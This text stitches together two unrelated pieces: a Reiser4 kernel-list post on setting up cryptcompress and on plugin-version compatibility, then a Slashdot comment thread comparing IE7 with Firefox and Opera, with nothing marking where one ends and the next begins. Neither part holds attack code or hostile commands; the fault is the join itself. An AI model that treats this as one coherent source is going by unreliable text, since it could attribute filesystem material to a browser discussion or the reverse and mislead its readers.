NOTE: We don't consider using pseudo interface (metas), as it is still
deprecated.
1. Build and boot the latest kernel of -mm series.
2. Build and install the latest version of reiser4progs(1.0.6 for now)
3. Have a free partition (not for product using).
4. Format it by mkfs.reiser4. Use the option -o to override "create"
and maybe other related plugins that mkfs installs to root
directory by default.
List of default settings is available via option -p.
List of all possible settings is available via option -l
For example:
"mkfs.reiser4 -o create=ccreg40 /dev/xxx"
specifies cryptcompress file plugin with (default) lzo1 compression
"mkfs.reiser4 -o create=ccreg40,compress=gzip1 /dev/xxx"
specifies cryptcompress file plugin with gzip1 compression.
Description of all cryptcompress-related settings can be found
here:
5. Mount the reiser4 file system (better with noatime option).
6. Have a fun.
NOTE: If you use cryptcompress plugin, then the only way to monitor
real disk space usage is looking at a counter of free blocks in
superblock (for example, df (1)), but first of all make sure (for
example, by sync (1)), that there is no dirty pages in memory,
otherwise df will show incorrect information (will be fixed).
du (1) statistics does not reflect (online) real space usage, as
i_bytes and i_blocks are unsupported by cryptcompress plugin
(supporting those fields "on-line" leads to performance drop).
However, their proper values can be set "offline" by reiser4.fsck.
NOTE:
1. Currently ciphering is unsupported (for this to work, some human
key manager is needed).
2. Don't create loopback devices over files managed by cryptcompress
plugin, as it doesn't work properly for now.
3. Make sure your boot partition does not contain files managed by
cryptcompress plugin, as grub does not support this.
C. Compatibility
WARNING: Don't try to check/repair your partition that contains
cryptcompress files with reiser4progs of version less then 1.0.6. Also
don't try to mount such partition in old kernels < 2.6.18-mm3.
We hope to completely avoid such compatibility problems (and therefore
to get rid of "don't mount to kernelXXX" and "don't check by
reiser4progsYYY" stuff) in future via using a simple technique based
on plugin architecture as it is described in the document appended
below. All comments, suggestions and, of course, bugreports are
<reiserfs-dev at namesys dot com>,
<reiserfs-list at namesys dot com>.
Hope, you'll find this stuff useful.
Reiserfs team.
Appendix D.
Devoted to resolving backward compatibility problems in Reiser4.
Directed to file system developers and anyone with an interest in
Reiser4 and plugin architecture.
Reiser4 file system: development, versions and compatibility.
Edward Shishkin
1. Backward compatibility problems
Such problems arise when user downgrades kernel or fsprogs package:
old ones can be not aware of new objects on his partition. We have
tried to resolve backward compatibility problems using plugin
architecture that reiser4 is based on. The main idea is very simple:
to reduce them to a problem of "unknown" plugins". However, this puts
some restrictions to the development model. Such approach (introduced
in 2.6.18-mm3 and reiser4progs-1.0.6) is considered below in details.
On one's way we try to clarify reiser4 possibilities in the
development aspect.
2. Core and plugins. SPL and FPL
Reiser4 kernel module consists of core code and plugins. Core includes
balancing, transaction manager, flush manager, etc. code manipulates
with virtual objects like formatted nodes, items, etc. Such
virtualization technology is not new and is used everywhere
(manipulations with VFS is a good example). Now it should be easy to
understand a concept of reiser4 plugin, the basic concept of reiser4
file system. Reiser4 plugin is a kernel data structure filled by
pointers to some functions (its "methods"). Each reiser4 plugin is
labeled by a unique pair (type, id), globally persistent plugin
identifier, so plugins with the same first components are of the same
type of data (struct typename_plugin). Plugin name is composed of id
name (first) and type name. For example: "extent item plugin" means
plugin of item type which manages extent pointers in reiser4. All
plugins of any type are initialized by the array typename_plugins.
Every reiser4 plugin has its counterpart in reiser4progs (1**).
Every reiser4 plugin belongs to one of the following two libraries
(the same for reiser4progs):
First library, SPL (per-Superblock Plugins Library), aggregates
plugins that work with low-level disk layouts (superblock, formatted
nodes, bitmap nodes, journal, etc). (Disk) format in reiser4 is a disk
format plugin (i.e plugin labeled by the pair (disk_format, id)). Disk
format are assigned per superblock. Disk format plugin installs node
plugin and some other SPL members to reiser4 superblock in mount time.
SPL has a version number defined as greatest supported disk format
plugin id.
Second library, FPL (per-File Plugins Library), aggregates so called
file managers which are to work with disk layouts (like item plugin),
represent some formatting policy (like formatting plugin), etc.
The "uppermost" plugins of file type are to service VFS entry points.
File managers are pointed by inode's plugin table (pset) described by
data structure plugin_set filled by pointers to plugins. Attributes
(type, id) of non-default file managers pointed in object's pset are
packed/extracted like other attributes to/from disk stat-data by
special stat-data item plugin. We associate FPL with a set of pairs
{(type, id) | type = file, directory, item, hash, ...}. FPL version
number is defined by another, more economic way (2**).
Every plugin has a version number defined as minimal version of
library which contains that plugin.
General version of reiser4 kernel module is defined as 4.X.Y, so that
X is version of SPL, and Y is version of FPL. We will say that X is
SPL-subversion, and Y is FPL-subversion of reiser4 kernel module. The
same for reiser4progs.
3. General disk version
Every reiser4 partition has general disk version 4.X.Y. Number X is
assigned by mkfs as some disk format plugin id (format 4.X) supported
by reiser4progs package, and can not be changed in future.
Y is assigned as FPL version of mkfs with the following upgrade at
mount time in accordance with kernel FPL version: if user mounts 4.A.B
to kernel with reiser4 module of general version 4.C.D, so that B < D,
and mount is okay, then general disk version will be updated to 4.A.D.
We will say that X is format subversion, and Y is FPL-subversion of
reiser4 partition.
4. Definition of development model
Here goes a set of rules which are not to be encoded. But first some
helper definitions.
Upgrading SPL means contributing a set of new SPL members, which
must include new disk format plugin.
Upgrading FPL means contributing a set of new FPL members and
incrementing FPL version number.
Upgrading reiser4 kernel module (reiser4progs) means upgrading SPL
and(or) upgrading FPL.
. Developer is allowed to upgrade reiser4 kernel module and
reiser4progs (3**).
. Kernel and reiser4progs should be upgraded simultaneously.
. Every such upgrade should be performed via applying a single
incremental patch.
. No "development branches", i.e. don't modify existing plugins (4**).
Issue only proved incremental patches.
As we will see below, such restrictions will help to provide
compatibility.
5. Supporting disk versions
Here we describe encoded support of the development model above. This
is what we aimed to minimize.
Suppose we want to mount a filesystem of version 4.A.B to kernel with
reiser4 module of version 4.C.D (or want to check it by reiser4progs
of such version). At first, kernel/reiser4progs will check format
subversion A. If A > C, then, obviously, format id A is unsupported by
kernel/reiser4progs, and mount/check will be refused. Suppose, format
subversion A is ok(supported). If B <= D, then in accordance with (4)
pset members packed in disk stat-data of every object are supported by
kernel/reiser4progs and there is no problems. The most interesting
case is when B > D. It means that disk can contain plugins that
kernel/reiser4progs is not aware of. Kernel and reiser4progs will
support such file system by different ways.
5.1. Kernel: fine-grained access to disk objects
First, some definitions.
If some plugin (file manager) is not listed by FPL of some kernel,
then we say that this plugin is unknown for this kernel, and file
managed by this plugin is not available in this kernel.
As it was mentioned above, all file managers are pointed by inode's
pset which is extracted from disk stat-data at ->lookup() time, and in
our approach this is the time when kernel recognizes unavailable
objects: if plugin stat-data extension contains unknown plugin type or
id, then read_inode() will return -EINVAL (or another value to
indicate that object is not available) and bad inode will be created.
Plugins missed in stat-data extension are assigned by kernel from file
system defaults, and, hence, are "known".
5.2. Reiser4progs: access "all or nothing"
Reiser4progs should be more suspicious about "unknown" plugins, as it
can be a result of metadata corruption. So if B > D, then reiser4progs
will refuse to work with such file system and user will be suggested
to upgrade reiser4progs. If reiser4progs package is uptodate (B <= D),
then unknown plugin type or id means metadata corruption that will be
handled by proper way.
6. Definition of compatibility
So, if B > D, then in spite of successful mount, in accordance with
(5.1) some disk objects can be inaccessible, and an interesting
question arises here: "what objects must be accessible in the case of
such partial access?". To answer this, we need some definitions.
. If some object of a semantic tree was created by kernel/reiser4progs
with FPL of version V, then we say that this object has version V.
Let's consider for every object Z of the semantic tree its version v(Z).
. If every object Z of the semantic tree is available in every kernel
with FPL of version >= v(Z), then we say, that the development model
is (weakly) compatible.
In contrast with (weak) compatibility, strong compatibility requires
each object to be accessible regardless of downgrade deepness. However
such concept does not have practical interest, and we won't consider
it. So we have a short answer on the question above: "development
model must be (weakly) compatible".
Note, that we define v(Z) to not depend on SPL version.
7. Plugin conversion
Plugins are allowed to modify object's plugin table (pset). This is a
case of so called plugin conversion, when management is passed to
another plugin of the same type: (type, id1) -> (type, id2). So,
plugin conversion is a type safe operation. Such dynamic (on-the fly)
conversion can be useful (5**). Examples:
. tail conversion (passing management from tail to extent item plugin
and back) performed for files managed by unix-file plugin. Came from
reiserfs (v3), although nobody suspected that this is a kind of such
plugin operation;
. file conversion (passing management from cryptcompress to unix file
plugin) performed for incompressible files.
Definition. If plugin conversion doesn't increase plugin version, then
we say it is squeezing.
8. How to provide compatibility?
Now it should be obviously, how to provide it: just upgrade reiser4
kernel module and reiser4progs in accordance with the
instructions (4).
Statement. "2-dimentional" development model defined by instructions
(4) is (weakly) compatible.
Proof. In accordance with definition of compatibility, it is enough to
consider only upgrading FPL. In accordance with the instructions (4)
every implemented plugin conversion is squeezing. Let's consider a
root node R of the semantic tree, so R consists of root directory and
all its entries. Since version of plugins pointed by root pset can not
be increased (6**), we have that every object Z of R is available in
every kernel with FPL of version >= v(Z). Do the same for every node
of the semantic tree in descending order.
9. On-disk evolution of format 4.X in compatible development model
How this theory looks in real life.
Suppose user has created (by mkfs) a file system of version 4.X.i, and
want to mount empty file system to kernel with version 4.Y.j (Y >= X).
If i < j, then kernel will upgrade disk version to 4.X.j and user will
be suggested to run fsck to update also backup blocks (7**). If i > j,
then kernel will complain that its FPL-subversion is too small, so
some files can be inaccessible. Actually even empty root directory can
be inaccessible in ancient kernels (if so, then mount will be
refused).
Suppose, mount was okay, and user was working for a long time with
this partition upgrading kernel from time to time, so FPL-subversion
numbers got upgraded to j_1, j_2, ...j_k (j < j_1 < ... < j_k). This
scenario defines on the latest FPL = FPL(j_k) a structure of nested
subsets (filtration):
FPL(j) < FPL(j_1) < FPL(j_2) < ... < FPL(j_k),
which induces filtration on the latest snapshot of user's semantic
tree:
T(j) <= T(j_1) <= T(j_2) <= ... <= T(j_k).
Here "<=" means "subtree" (i.e. T(j_1) is a subset of T(j_2), moreover
T(j_1) is a tree with the same root). T(j_s) is a snapshot of the
semantic tree that was upgraded to j_(s+1), or a part of this snapshot
(if something was removed after later upgrades). T(j_s)\T(j_(s-1))
("\" is "without") contains objects of version j_s.
In accordance with the development model above all elements of T(j_s)
are managed by plugins of versions <= j_s, and, hence, all of them
will be accessible in kernels with FPL version >= j_s.
10. Subversion numbers: why do we need this?
One can ask: "Why do we need to keep/manage FPL-subversion numbers?
Just add new per-file plugins properly, and everything will be
recognized/handled automatically". For sure, indeed. However, keeping
track of them is useful for some reasons:
. For fsck to catch metadata corruption as it was described in (5.2).
. For various accessibility issues. For example, you have offline
reiser4 partition and want to know what kernel will provide full
access (not restricted) to all objects (solution: run debugfs.reiser4,
look at disk subversion number, then have a kernel with appropriate
FPL version).
11. Examples
11.1. Transparent compression support
The following is a list of FPL members that have been added for such
support:
. cryptcompress file plugin
. ctail item plugin
. compression transform plugins (new type)
. compression mode plugins (new type)
11.2. Transparent encryption support
Not yet implemented. It is supposed to be implemented for existing
cryptcompress file plugin: one just need to add cipher transform
plugins (it should be wrappers for linux crypto-api) and provide human
key manager.
11.3. Supporting ECC-signatures for metadata protection
Not yet implemented. In order to support such signatures we need new
node format and, hence, new disk format plugin id. ECC signature
should be checked by zload() for data integrity and possible error
correction, and updated in commit time right before writing to disk.
11.4. Supporting xattrs
Not yet implemented. Here we need new stat-data extension plugin (for
packing/extracting namespaces, etc.) and a new file plugin as the most
graceful way to not allow old objects acquire new stat-data extension
(i.e. to not break compatibility).
------
(1**) Counterpart with the same (type, id) in reiser4progs can do
different work. For example, fsck doesn't perform data decompression,
but uses compression plugin (namely, its ->checksum() method) to check
data integrity.
(2**) Currently it is hardcoded, see definition of
PLUGIN_LIBRARY_VERSION in kernel (reiser4/plugin/plugin.h) and
reiser4progs (include/reiser4/plugin.h).
(3**) We don't consider modifications of core code, as it doesn't
break compatibility, at least we put efforts for this.
(4**) However, anyway, it is impossible to avoid various bugfixes and
micro-optimizations. Instructions about modifications of existing
plugins is out of this paper. For now just make sure, that they don't
break compatibility. Changing disk layouts and using non-squeezing
plugin conversion is unacceptable.
(5**) Actually, it is not easy to implement plugin conversion: most
likely that it won't be a simple update of file's plugin table (pset),
but will also require conversion of controlled objects and
serialization of critical code sections that work with shared pset.
(6**) Actually, plugin set of root directory can not be changed at
all, as it defines "default settings" for the partition.
(7**) Backup blocks are copies of main superblock spread through the
whole partition. Before updating backup blocks, fsck will check the
whole partition for consistency. It shouldn't cause discomfort, as
upgrading reiser4 is not a frequent event. Anyway, specification of
backup blocks is quite complex and it is better for kernel to not be
aware about them (they just look as busy blocks for kernel). Updating
status of backup blocks is reflected by special flag in superblock.
Mounting with not updated backup blocks is possible without any
additional options: kernel will warn for every such mount. When
rebuilding crashed filesystem with not updated backup blocks, user
will be suggested to confirm that new disk version in main superblock
is correct (not a result of metadata corruption).
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at
Please read the FAQ at | http://lkml.org/lkml/2007/3/14/446 | crawl-002 | refinedweb | 3,543 | 56.45 |
$wgGroupPermissions['*']['read'] = false; $wgGroupPermissions['*']['edit'] = false; $wgGroupPermissions['user']['read'] = false; $wgGroupPermissions['user']['edit'] = false;
MediaWiki is designed for the most part to be an open document repository. In most setups (presumably), everyone can read and only registered users can edit. However, permissions can’t get much more granular than this. For my project at least, I would like to not just limit anonymous users from editing, I would like to selectively limit them from reading certain things.
I looked around for quite some time until I came upon a variable you can set in your LocalSettings.php file: $wgWhitelistRead. Basically, this variable whitelists the pages specified in the array. The downside to this is you can’t use wildcards or namespaces/categories. You must specify a single page per array value. This doesn’t quite cut it for my needs. That being said, here’s my solution (albeit rough).
The end goal here looks like this…
All users are blocked from reading and writing all pages
Users in all groups are then given read access to the whitelisted namespaces
Finally, users in the specified groups have read and write access to all pages (save for the administration/sysop pages of course).
To do this, in your LocalSettings.php file, place the following four lines…
$wgGroupPermissions['*']['read'] = false; $wgGroupPermissions['*']['edit'] = false; $wgGroupPermissions['user']['read'] = false; $wgGroupPermissions['user']['edit'] = false;
Once you have the lines in the last section in your config file, your entire wiki should be unavailable, even to sysop people (they are users after all). To give access back to your sysop folk, place the following two lines in your LocalSettings.php file
$wgGroupPermissions['sysop']['read'] = true; $wgGroupPermissions['sysop']['edit'] = true;
This will only grant access to your sysop authenticated users. If they’re not already authenticated, they still can’t get to the Special:UserLogin form (we’ll get to that in just a few) to login. They may be sysops at heart, but hearts don’t authenticate people without usernames and passwords.
Now that our sysops have permissions, next we need a custom group so we can grant permissions to them. We’ll call that group GreenTea (yes, I’m drinking some green tea right now). To do that, let’s throw another few lines in the LocalSettings.php file…
$wgGroupPermissions['greentea'] = $wgGroupPermissions['user']; $wgGroupPermissions['greentea']['read'] = true; $wgGroupPermissions['greentea']['edit'] = true;
Now that our group is set up, we need to whitelist the necessary and wanted pages for anonymous folk to log in and/or do their thing depending on what groups they are in. To do this, let’s add yet another few lines to our LocalSettings.php file
$wgWhitelistRead = array( 'Main Page', 'Special:Userlogin', 'Special:UserLogout', );
What we just did was whitelist the main page, the login page, and the logout page. This allows users to get in and out of your wiki, whether or not their permissions allow them access to anything. At this point, you can log in with your sysop user and put people into our previously created greentea group. Once that’s done, the greentea users should have full access to the entire wiki.
I would like to note here that that this point, users outside of the greentea group will have the same permissions as anonymous/unauthenticated users. They cannot read or edit any pages other than the ones currently whitelisted.
This is the only part that’s out of the ordinary here. We are going to edit actual MediaWiki code. The big downside to doing this is that if the MediaWiki instance is upgrade, it is highly likely that the changes made in this section will be overwritten. Thankfully though, the changes are very simple, so making them again shouldn’t be a problem. They’re so simple in fact, I think the MediaWiki folks might actually accept my code into their branch.
To set up our MediaWiki instance so it handles regex whitelist statements, we need to edit the Title.php file in the includes directory.
Firstly, we need to comment out the code that processes the whitelist variable. Head to around line 1870 in Title.php and comment out just the following lines
//Check with and without underscores if ( in_array( $name, $wgWhitelistRead, true ) || in_array( $dbName, $wgWhitelistRead, true ) ) return true;
Now that those have been commented out, we need to add in the code that will process regex statements in the whitelist array. Below the lines you just commented out, add the following code…
foreach ( $wgWhitelistRead as $item ) if ( preg_match( '/^'.$item.'$/', $name ) || preg_match( '/^'.$dbName.'$/', $name ) ) return true;
To use the changes we just put in place, all that needs to be done is edit the $wgWhitelistRead variable in LocalSettings.php again.
Say, for example, that we have a HowTo namespace (HowTo:Drink Green Tea for example) that we want everyone to be able to read that isn’t in the greentea group (they have to learn somehow after all). All that needs to be done is a little regex…
$wgWhitelistRead = array( 'Main Page', 'Special:Userlogin', 'Special:UserLogout', 'HowTo:.*', );
That just whitelisted all pages inside the HowTo namespace.
In case anyone who doesn’t know is wondering why you put a .* at the end of the HowTo namespace, here you go.
In regular expressions, various symbols have different meanings. In this case, the period signifies any case letter, number, symbol, etc. That means that HowTo:. would match anything like HowTo:A, HowTo:3, HowTo:-, etc. It would however not match HowTo:A123. Why? The period in regular expressions matches only one character. What we need is to say match any character any number of times after HowTo:. For that we’ll need the asterisk.
The asterisk in regular expressions is what we call a quantifier. It doesn’t represent a character so much as a quantity. In non regex terms, an asterisk means that the previous character in the regex string can be repeated zero or more times and still match. That means that the regular expression c* would match nothing, c, cccc, cccccc, etc. It would however not match for example, b, 5, 12345a, etc. In our example, HowTo:.*, the period represents any character and it is followed by an asterisk, so that means that any article that starts with HowTo: will match, no matter what the ending, even if it doesn’t have one.
Hopefully someone finds this post useful. If anyone has questions about .* please ask them in the comments. | https://oper.io/?p=Whitelist_MediaWiki_Namespaces_with_$wgWhitelistRead | CC-MAIN-2017-26 | refinedweb | 1,075 | 63.9 |
1 /* HintTypeT: HintTypeTest.java,v 1.4 1999/08/19 15:16:59 jochen Exp $18 */19 20 21 /**22 * The primitive types can give some headaches. You almost never can say23 * if a local variable is of type int, char, short etc. <p>24 *25 * Most times this doesn't matter this much, but with int and character's26 * this can get ugly. <p>27 *28 * The solution is to give every variable a hint, which type it probably is.29 * The hint reset, when the type is not possible. For integer types we try30 * to set it to the smallest explicitly assigned type. <p>31 *32 * Some operators will propagate this hint.<p>33 */34 public class HintTypeTest {35 36 public void charLocal() {37 String s= "Hallo";38 for (byte i=0; i< s.length(); i++) {39 char c = s.charAt(i);40 if (c == 'H')41 // The widening to int doesn't occur in byte code, but42 // is necessary. This is really difficult.43 System.err.println("H is "+(int)c);44 else45 System.err.println(""+c+" is "+(int)c);46 }47 }48 }49 50 51
Java API By Example, From Geeks To Geeks. | Our Blog | Conditions of Use | About Us_ | | http://kickjava.com/src/HintTypeTest.java.htm | CC-MAIN-2016-44 | refinedweb | 204 | 76.93 |
IE7 From a Firefox User's Perspective 250
Buertio writes, "A week with IE takes a look at IE7 from the perspective of a long-time Firefox user. The verdict? Microsoft has come a long way but still has some way to go before taking on Firefox and Opera."
Opportunity (Score:5, Interesting)
Firefox will go through the same thing next year, since Firefox 3 won't run on Windows 98 or Me, but it'll still run on Windows 2000. Of course, that's another 8-10 months for some users to upgrade (those percentages are about a third of what they were a year ago) -- and if you've gotten them hooked on Firefox while they're on Win98, they'll probably stick with it when they move to a new machine with XP/Vista. And in a year or two, as IE7 supplants IE6 and websites start targeting it, those holdout Windows 98 users might decide they're better off with a slightly-outdated Firefox 2 than a massively-outdated IE6.
Re:Opportunity (Score:5, Insightful)
Sure, you can try and get your 98 and ME-using friends to use Firefox, but suggesting that it might be a good idea for the project as a whole to go after a small and shrinking segment of the population, particularly when that segment of the population is defined in part by not liking change, does not seem to be a winning strategy to me.
Re:Opportunity (Score:5, Interesting)
Re:Opportunity (Score:5, Funny)
So basically, you screamed at them for telling her exactly the same thing you did?
Re: (Score:3, Insightful)
Begone, androgynous blowhard.
[1]presumably to extend the grip of the fifth branch of government, Redmond
Re: (Score:2)
Trying to kickstart a little circulation above the neck, there are bootable ISOs aplenty, many of which target that old Packard Bell just fine.
Assuming tech support also stands to piss, they will know enough to tell people to run dhclient or whatever the distro uses t
Re:Opportunity (Score:4, Interesting)
Re: (Score:2, Insightful)
Is anyone else confused by this?
Re: (Score:3, Funny)
No, I didn't get confused. (Score:2)
Re: (Score:2)
So why did you yell at them as you clearly seem to agree with them in the end?
Re:Opportunity (Score:4, Insightful)
Re: (Score:2)
Still it's nice to have the latest FF browser if only because we know it gives some of the security that Windows never had.
(I'm typing this from a 500 mHz Compaq PIII that was to upgraded to Xubuntu with FF2.0 including Flash9b)
Re:Opportunity? For what else? (Score:3, Interesting)
Back w
Re: (Score:2)
Actuall
Re: (Score:2, Informative)
Minimo (Score:3, Informative)
Re: (Score:3, Insightful)
minimo is far too big and too slow to be used in a mobile device. as much as i love mozilla on pc (using it since 1999) opera mobile is currently the best mobile browser.
Re: (Score:2)
Also, a growing number of users will be relying on the web for running web apps, so:
- IE6 is a PITA as a webapp client (try selecting from a longish dropdown menus typing the first letters on the keyboard...)
- IE7 won't be available for web clients with linux embedded, a big market in the near future IMHO
- FF2 spelling chec
Re: (Score:2, Insightful)
I doubt that many people who aren't running XP will switch to Firefox - the likelihood is that anyone in that situation who hasn't already switched won't understand and won't care.
Re: (Score:3, Insightful)
Also notice that IE7 *requires* a legal copy of Windows XP, you need to run through this WGA thing. And even if it's possible to circunvent it, it's unlikely that most of the people (who doesn't have windows license) will do it. So it's possible that a big number of XP users *will* install firefox, just for not being left behind of the IE7 users and firefox users.
Re: (Score:2)
Statistics From My Website are Scary. (Score:3, Informative)
Well this is pretty scary. My website [darwinawards.com] usage? Out of 150,000 cgi hits in October... rounded to one sig digit...
126,000 Windows NT
9,000 Mac OS X
2,000 Yahoo! Slurp
3,000 Windows 98 (or Win98)
2,000 Linux
600 Windows CE
400 Mac_PowerPC
200 Windows 95
200 Windows ME
70 Windows CE
40 Blackberry
and approx 162 misc entries.
I had no idea the world was so overwhelmingly Windows! Grrr.
I can do this also for the 7,000,000 monthly "regular" page hits (as opposed to cgi) but I assume I'd get about the same res
Re: (Score:2)
The majority of Windows users out there are on 95 or 98. It may be true that the majority of the ones who actively use the web are on XP, though.
Re: (Score:2)
Breaking apps? (Score:2)
Such as Oracle's Jinitiator.
how about IE7 from a links2 user? (Score:4, Funny)
Tarnished Brand (Score:5, Interesting)
All Microsoft can hope to do at this point is prevent more users from switching away, but that'll only work so long as IE7 doesn't become an exploitfest like its mildly-retarded predecessor. The next year or so will determine that as more IE6 users and malware authors migrate to IE7.
Re: (Score:2, Interesting)
No... Simply No....
You are so wrong, you don't even see it. Internet Explorer is a tarnished brand for the people that read slashdot, for the people that care about interoperability, for those that care about standards. Outside of that world, there is a world where Microsoft is a good brand name, equivalent to Jaguar in cars! Microsoft is the brand that bring you computing, that *is* computing.
I know that what the above paragraph says is not true, but it is for millions and millions of people.... I
Re: (Score:2)
-matthew
IE 7 RSS reader? (Score:5, Interesting)
Before taking on Firefox and Opera? (Score:4, Insightful)
Re: (Score:2)
Re:Before taking on Firefox and Opera? (Score:5, Insightful)
It's a completely valid and highly useful way of looking at things. It actually makes more sense to me personally than going by aggregated statistics which lump all things together. Some sites are dominated by Firefox users. Other sites are not. The sites that are dominated by Firefox represent valid and lucrative markets in and of themselves. Of course if you aggregate everything together into one big lump, then in terms of numbers, IE is "winning". But that's not a very meaningful way to look at things. For exactly the same reason GDP is a horrible way to estimate economic health of a nation, and all the sane economists know this.
IE has more market share than the iPod... (Score:2)
sure... (Score:5, Insightful)
Well, considering it has the majority market share, it looks like they need to do nothing. They've already won the battle, it's up to Firefox and Opera to take on them.
Re: (Score:2)
ie better than firefox and opera in xml/ xsl (Score:3, Informative)
and opera flat out just doesn't support xsl formatting [opera.com]
nevermind ie7, ie6 does both, just fine
in my book, as an xml/ xsl programmer, ie is light years ahead of firefox and opera
Re: (Score:2, Insightful)
Re: (Score:2)
Re: (Score:2)
In Mozilla, this happen quite a lot, in Opera less so, but it is still not interactive responsive enough for my taste (even though that's the best I know), with multiple window when one window was frozen, you could still use the other without trouble: that's a defini
It's a matter of putting priority fixes first (Score:2, Insightful)
Re:ie better than firefox and opera in xml/ xsl (Score:5, Interesting)
I can't understand this. IE doesn't even preserve the encoding type on an XSL transform. I can't use it *at all* for my Japanese documents.
And it has unbelievably poor support for CSS. It won't even do tables. Not even in IE 7...
Your comment kind of blows me away...
i agree with you (Score:2)
as xml and xsl support improves, i'd say that the way you and i are working is the foundations of web 3.0
Re: (Score:3, Informative)
Make sure your page loads in standards mode instead of quirks mode by defining an appropriate doctype. If you don't have a doctype, or have an incorrect doctype, it will behave like IE 5 for backwards compatibility reasons.
Mod parent way, way down (Score:4, Insightful)
Now let's see. IE can't handle application/xhtml+xml. Its JavaScript implementation doesn't support any of the namespaced DOM functions (createElementNS, getAttributeNS, etc.) making it pretty much useless for any sort of dynamic handling of XML that contains multiple namespaces. Hell, IE7 fails 38% of the W3C's DOM test suite.
Obviously, MoFo has omitted several rather important things from their browser product, one of them happening to be the ability to load external entities. But to say that Opera doesn't support XSLT is just blatantly wrong, and while I certainly don't advocate working around broken browser behaviour, it's certainly something that's done a lot for IE -- I bet you could do it for Firefox's flaw, too, if you spent less time complaining and more time working.
Memory Issues (Score:4, Insightful)
Re: (Score:2)
Well.... (Score:5, Insightful)
I can't speak to Opera, by Firefox 1.5 crashes on me much more than IE6 ever did (based on experience with two different machines), and my experience with IE7 is that it is solid. And some sites using fancy forms (for example, my LinkSys/Cisco home router) don't work with FF at all.
Don't get me wrong, Firefox is still my default browser (I'm using it now), but by some meterics IE is more than a match.
Re: (Score:2, Interesting)
Re:Well.... (Score:5, Informative)
Re: (Score:2)
I don't use
Re: (Score:3, Insightful)
IE7.. got it.. nothing to write home about. Cute upgrade. Still like Firefox a lot more.
Here's something to chew on. I know a whole bunch of people whose machines were seriously pwned because of IE exploits. Thats enough to turn you off a piec
Re: (Score:2) [mozillazine.org]
Re: (Score:2)
Drawback (Score:4, Insightful)
Re: (Score:2)
Re: (Score:2)
On the bright side, if they happen to be Linux or OS X user, IE won't work at all.
Re: (Score:2)
Re: (Score:3)
IE7 Text Rendering (Score:4, Interesting)
Re:IE7 Text Rendering (Score:5, Informative)
Re:IE7 Text Rendering (Score:5, Insightful)
Regardless whether or not you like cleartype or not. IE7 should obey the system settings for that setting. I have turned off cleartype in XP, the text is to blurry for my taste, so it was quite annoying that IE7 did come with cleartype turned on by default and ignoring my system wide settings. How to turn off cleartype wasn't very intuitive either. Who would know that that setting is listed below multimedia?
Re:IE7 Text Rendering (Score:5, Informative)
Minor correction, your sentence should say assimilation not innovation .
Microsoft did not invent ClearType. [grc.com]
Enjoy,
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:3, Interesting)
Re: (Score:2)
Thanks for the reminder: I had forgotten to turn on ClearType on this new work laptop.
Re: (Score:3, Informative)
LiveBookmark Folders (Score:5, Interesting)
I enjoy FireFox's live bookmarks because it gives me a quick and screen friendly way of scanning stories on sites like BBC,
Microsoft's Answer: display as a normal website with prettier formatting - and advertisements.
One saving grace for IE 7's implemenation of RSS feeds - it syncs them with Outlook 2007, where I can scan them easily as if they were email messages.
My verdict? Firefox still wins this match.
Re: (Score:2)
Yeah, it really surprised me the first time I saw IE's RSS page rendering when I was testing my own Drupal-based site. I thought at first that Drupal had applied a CSS or XSL transformation to it, and wondered where that code came from.
It's kinda cool that they use the categories supplied with the items to generate a menu though. It works very well with Drupal's feeds [drupal.org] (the menu on the right).
IE dejavu all over again... (Score:2)
It has an erie deja vu feeling of when Apple put an ad out welcoming IBM to the PC market.
Re: (Score:2)
It was Apple welcoming MS with Win95... IBM was a big player in the early PC market. "IBM-Compatible" used to be the defacto term, not "PC".
**mumbles about Whippersnappers...
Re: (Score:3, Funny) [flickr.com]
In the ad they use the term personal computer which at that time was abbreviated as PC. This was before Compaq made the first IBM clone. It was run in August of 1981.
*** mumbles about absent minded oldies....
Here's the text if you're running a non-gui computer
Welcome, IBM. Seriously. Welcome to the most exciting and important marketplace since the computer revolut
By the way (Score:2)
I started downloading it.
(Mind you it is really slow and stopped at 33kb)
Re: (Score:2)
FF 2 lacks a real page zoom (Score:4, Interesting)
FireFox 2 lacks page zooming, which from a my perspective is impossible to live without on certain displays.
I'm a web developer (sometimes), and I love FireFox. As a developer I love FireFox because the Gecko team show consistent progress towards standards. From this perspective, FireFox is what the web should be. The worst thing about developing for FireFox is... writing broken code with comment hacks to support IE's nonstandard ways. But that's not FireFox's fault.
For DEMO or home theater purposes, FireFox is (on a high-res display) very very unusable.
Why?
FireFox 2 has no page Zoom. FireFox offers unchanged as a featurem plain old "Text zoom", which is not the same.
The fact that many pages don't scale to different resolutions well is not FireFox's fault.
But until all websites adopt a consistent method of page scaling, the workaround is going to be Page Zoom.
On a 42" LCD (1920x1080p), a fullscreen FireFox browser is legible from about 3 feet away (with my eyes).
If you make the text bigger, the page layout goes toast in FF. SURE, you can go in and change your video resolution to a non-native size and cause everything to get bigger, but that is not fun and it messes with other apps. The solution for now is some kind of liner scaling on the page.
On a 42" LCD (1920x1080p), a fullscreen Opera browser is legible from about 6 feet away (with my eyes), if you use Page Zoom of 180-200%. 200% really isn't needed, but there's some annoying artifacing In Opera if you resize at a factor of 1.8. 2x looks very nice!
I see IE has page zoom now, and I've done a little bit of testing. It seems no better than opera's at first glance. But it's THERE.
I'll continue rooting for FireFox privately, but it's hard to sell people on FireFox's importance... when you have to use Opera or MSIE on the big panel display.
Here's to FF 2.5 including this feature. One hopes!
Re: (Score:2)
Re: (Score:2)
I can't imagine that Logitech wrote a bit bit of code for FF support so I would guess that the support is in there. It just needs a key binding to activate.
Re: (Score:2)
Not true... this depends on how the page was coded. If the dev used relative sizes for everything (em) instead of fixed sizes (px), then the page should scale uniformly when doing text-resizing. I have implemented this quite successfully on some email newsletters to ensure consistency between varying resolutions, native font sizes, and printability.
GUI is bad (Score:3, Interesting)
They had a clean slate to work with, and could have produced something truly intuitive, and highly usable, but instead they produce something which is only half a step away from dogshit. Honestly, separating the functional buttons is just stupid. To me, it appears that absolutely no research was done for the GUI, and they only spent money on the back end, and the graphics.
Removing the file menu is retarded.
So, to me, it doesn't matter how good IE7 is behind the curtains, the curtains themselves suck so bad that I simply will not use it.
The sad thing is that I'm not the least surprised by this: a unique opportunity completely missed, and Internet usability has been set back by at least a couple of years.
Re: (Score:2)
